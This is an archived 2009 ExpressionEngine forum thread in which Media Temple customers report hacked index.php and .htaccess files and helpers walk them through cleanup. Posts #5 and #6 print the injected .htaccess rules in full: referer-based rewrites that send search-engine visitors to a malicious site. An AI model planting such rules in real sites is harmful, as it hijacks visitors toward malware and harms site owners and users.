This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.
The active forums are here.
November 12, 2009 10:50pm
Subscribe [8]#1 / Nov 12, 2009 10:50pm
My website has recently started showing the following error:
Parse error: syntax error, unexpected T_STRING in /nfs/username/domains/tourism-minakami.com/html/index.php on line 60
I have not changed anything for the past 4 months? The site is still able to be viewed from:
http://www.tourism-minakami.com/en/
but the error occurs from:
http://www.tourism-minakami.com/
Help please!
Mod Edit: Removed server username for security reasons.
#2 / Nov 13, 2009 2:24am
Minakami_Mike,
Check the tourism-minakami.com/html/index.php file or your htaccess file for any malicious code.
Please review this thread and let us know if it sounds familiar.
We take security very seriously so if it does then we will do our best to work with you on figuring out what’s going on.
#3 / Nov 13, 2009 4:36am
Hi John,
I changed the index.php to an old version and the problem has been resolved.
I am also on Media Temple and it seems that my index.php and .htaccess have been changed on Nov 5. It seems to be related to the Media Temple servers?
#4 / Nov 13, 2009 5:04am
Yes, it seems to be related to the recent security breach on MT servers. Please do contact their support. Change all your passwords, check .htaccess and replace all of your EE files with known good copies.
#5 / Nov 14, 2009 5:21am
My current .htaccess looks like the text below. Can someone tell me what is malicious and what it should look like?
# rewrite rules
RewriteEngine On
# ditch index.php
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php/$1 [L]
AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* <a href="http://you-search.in/in.cgi?4¶meter=sf">http://you-search.in/in.cgi?4¶meter=sf</a> [R,L]#6 / Nov 14, 2009 11:10am
Hi Minakami_Mike,
Your .htaccess file does not look correct. This section:
AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* <a href="http://you-search.in/in.cgi?4¶meter=sf">http://you-search.in/in.cgi?4¶meter=sf</a> [R,L]looks as if it has been added and the RewriteRule at the end does point to a known malicious site. Please remove these lines and then report this to MT support and ask them to check that the permissions are appropriate for your files including your .htaccess file.
Cheers
Greg
#7 / Nov 18, 2009 7:26pm
Exact same thing happened to me - on Media Temple, hacked index.php and .htaccess file on all my EE sites.
#8 / Nov 18, 2009 7:38pm
@rmhayler
We take security very seriously here at EllisLab. Can you report your attack to Media Temple, and follow up with us?
Thanks!
#9 / Nov 18, 2009 11:08pm
Below is the reply I received from Media Temple:
Michael,
The permissions on those files appear to be correct.
I would recommend simply updating your passwords, as well as updating to the latest version of Expression Engine, including all plugins or any other modifications to the software.
If you have any further questions regarding your (mt) Media Temple servers, please let us know.
Best Regards,
Julian N.
Customer Support
(mt) Media Temple
<v> 877-578-4000
<f> 310-564-2007
User Forums: http://kb.mediatemple.net/questions/824/
#10 / Nov 19, 2009 3:46am
Yes, it’s pretty standard advice, but still a good idea. There has been a series of incidents of this nature at MT recently.
#11 / Nov 23, 2009 3:47pm
Hi -
I’ve just had the same issue on an MT hosted site. I’ve regenerated my .htaccess file, updated my passwords and removed the offending code from the index file. I’m also reporting to MediaTemple.
Should I re-upload the system files? Are there any risks with regard to losing work done?
thanks
Kevin
#12 / Nov 23, 2009 3:51pm
Should I re-upload the system files? Are there any risks with regard to losing work done?
I would recommend it, upgrading to the latest version/build in the process. All of your EE related work (templates, entries etc) is stored in the database.
#13 / Nov 23, 2009 5:42pm
I’ve updated my EE install and done everything suggested - thanks for the help. There are a couple of static sites on the same MT account, and their index files had the malicious code inserted too, as well as a couple of wordpress installs.
#14 / Nov 23, 2009 5:43pm
Thanks for letting us know, kev_horan. We appreciate the feedback.
#15 / Nov 23, 2009 5:46pm
This happened to at least 6 client sites as well as several of my own hosted on MT’s grid servers. The official line from MediaTemple for me was that I need to take every step to use secure passwords and that all php code is vulnerable.
I do not believe that this is a case of poor password choice - this is happening to swarms of people all over the grid.
MT sent me this info about using phpsecinfo
http://kb.mediatemple.net/questions/1700/Increase+PHP+security+with+phpsecinfo
and they have an injection article on their KB as well
http://kb.mediatemple.net/questions/1715/Working+with+a+php+injected+website
I think at a certain point they are going to have to admit some responsibility for these attacks, but in the mean time, I’m trying to figure out what else I can do on my end.
Hope this helps,
Jess